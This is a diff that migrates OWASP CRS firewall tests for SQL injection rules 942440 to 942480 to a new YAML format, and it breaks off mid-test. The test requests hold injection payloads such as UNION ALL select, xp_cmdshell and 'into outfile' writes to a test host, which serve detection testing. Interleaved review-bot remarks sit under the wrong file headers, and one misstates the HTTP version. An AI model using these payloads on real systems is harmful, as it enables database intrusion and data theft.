+ expect_ids: [942440] + - test_id: 16 desc: "Avoid False Positive on JWT (body)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "POST" - port: 80 - version: "HTTP/1.1" - uri: "/post" - data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - output: - no_log_contains: id "942440" - - test_title: 942440-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + log: + no_expect_ids: [942440] + - test_id: 17 desc: "Avoid False Positive on JWT (cookie)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - method: "POST" - port: 80 - version: "HTTP/1.1" - uri: "/post" - data: "foo=bar" - output: - no_log_contains: id "942440" - - test_title: 942440-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "foo=bar" + output: + log: + no_expect_ids: [942440] + - test_id: 18 desc: "Avoid False Positive on JWT (querystring)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - 
port: 80 - version: "HTTP/1.1" - uri: "/get/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - output: - no_log_contains: id "942440" - - test_title: 942440-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + log: + no_expect_ids: [942440] + - test_id: 19 desc: "False positive against Facebook click identifier" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: "/get?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" - output: - no_log_contains: id "942440" - - test_title: 942440-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" + output: + log: + no_expect_ids: [942440] + - test_id: 20 desc: "False positive against Google click identifier" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: "/get?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" - output: - no_log_contains: id "942440" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" + output: + log: + 
no_expect_ids: [942440] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml index 7d32031..bf0f304 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml 
@@ -1,92 +1,90 @@ --- meta: author: "William Woodson, azurit" - description: None - enabled: true - name: 942450.yaml +rule_id: 942450 tests: - - test_title: 942450-1 + - test_id: 1 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=%5c0xf00dsdfdsa" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-2 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=%5c0xf00dsdfdsa" + version: HTTP/1.0 + output: + log: + expect_ids: [942450] + - test_id: 2 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-3 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" + version: HTTP/1.0 + output: + log: + expect_ids: [942450] + - test_id: 3 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=select%200x616263" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-4 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=select%200x616263" + version: HTTP/1.0 + output: + log: + expect_ids: [942450] + - test_id: 4 desc: "SQL Hex Encoding - negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=IHRlc3Q0xAcF" - version: HTTP/1.0 - output: - no_log_contains: id "942450" - - test_title: 942450-5 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=IHRlc3Q0xAcF" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942450] + - test_id: 5 desc: "SQL Hex Encoding - negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" - version: HTTP/1.0 - output: - no_log_contains: id "942450" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942450] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml index 7d99328..9a2b72a 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml 
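Review bot: Scalar quoting is inconsistent across the migrated files: in this 942450 hunk the new lines write `method: POST` and `version: HTTP/1.0` unquoted, whereas the 942440 tests above keep `method: "POST"` and `version: "HTTP/1.0"`, and in the 942480 hunk tests 1–2 quote `dest_addr: "127.0.0.1"` / `Host: "localhost"` while tests 3–12 of the same file leave them bare. The values are equivalent YAML either way, so this is only style, but since the migration rewrote every line anyway it is the natural moment to settle on one convention per field (the unquoted form used by the majority of the new lines) so later diffs stay minimal. The same remark applies to the 942460, 942470 and 942490 hunks.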
@@ -1,41 +1,39 @@ --- meta: author: "Franziska Bühler, azurit" - description: None - enabled: true - name: 942460.yaml +rule_id: 942460 tests: - - test_title: 942460-1 + - test_id: 1 desc: "Repetitive Non-Word Characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=foo...." - version: HTTP/1.1 - output: - log_contains: id "942460" - - test_title: 942460-2 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=foo...." + version: HTTP/1.1 + output: + log: + expect_ids: [942460] + - test_id: 2 desc: "Repetitive Non-Word Characters negative test only 3 characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=foo..." - version: HTTP/1.1 - output: - no_log_contains: id "942460" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=foo..." + version: HTTP/1.1 + output: + log: + no_expect_ids: [942460] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml index e2b679c..3496a13 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml 
@@ -1,193 +1,191 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942470.yaml +rule_id: 942470 tests: - - test_title: 942470-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=nvarchar" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=nvarchar" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 2 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_cmdshell" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_cmdshell" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 3 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"pay=varchar" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=varchar" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 4 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_dirtree" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_dirtree" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 5 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_regread" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_regread" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 6 desc: "SQL Injection Attack" stages: - - 
stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sp_password" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sp_password" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 7 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UTL_HTTP" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UTL_HTTP" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 8 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=OPENROWSET" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=OPENROWSET" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 9 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sp_executesql" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 10 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sp_executesql" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 11 desc: "SQL Injection Attack: current_user" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=1%2bcurrent_user::int" - version: HTTP/1.0 - output: - log_contains: id "942470" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=1%2bcurrent_user::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml index af47b15..cf93c29 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml 
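Review bot: Tests 1 through 10 in this hunk all carry the identical `desc: "SQL Injection Attack"`, so a failing run reports ten indistinguishable cases; only test 11 names its keyword (`current_user`). The description was already generic before the migration, but now that each test has a numeric `test_id` instead of a `942470-N` title, the desc is the only human-readable hint left, so naming the probed keyword per test would help, e.g. `desc: "SQL Injection Attack: xp_cmdshell"` for test 2. Test 10 in particular deserves a note that its body is the bare string `sp_executesql` with no parameter name, which is what distinguishes it from test 9.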
@@ -1,211 +1,209 @@ --- meta: author: "Jose Nazario, azurit" - description: None - enabled: true - name: 942480.yaml +rule_id: 942480 tests: - - test_title: 942480-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # variable name boundary attacks - uri: "/get?'msdasql'" - version: HTTP/1.0 - output: - log_contains: "id \"942480" - - test_title: 942480-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # variable name boundary attacks + uri: "/get?'msdasql'" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 2 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - # variable name boundary attacks - Cookie: "'msdasql'" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: "id \"942480" - - test_title: 942480-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + # variable name boundary attacks + Cookie: "'msdasql'" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log: + 
expect_ids: [942480] + - test_id: 3 desc: "Data dump using 'into outfile'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 4 desc: "Data dump using 'into outfile'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 5 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=0.3480567293179807' UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=0.3480567293179807' UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 6 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=config.ini\") UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=config.ini\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 7 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=CRS) UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - 
test_title: 942480-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=CRS) UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 8 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=CRS3\") UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=CRS3\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 9 desc: "SQL injection using 'overlay(...placing..)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 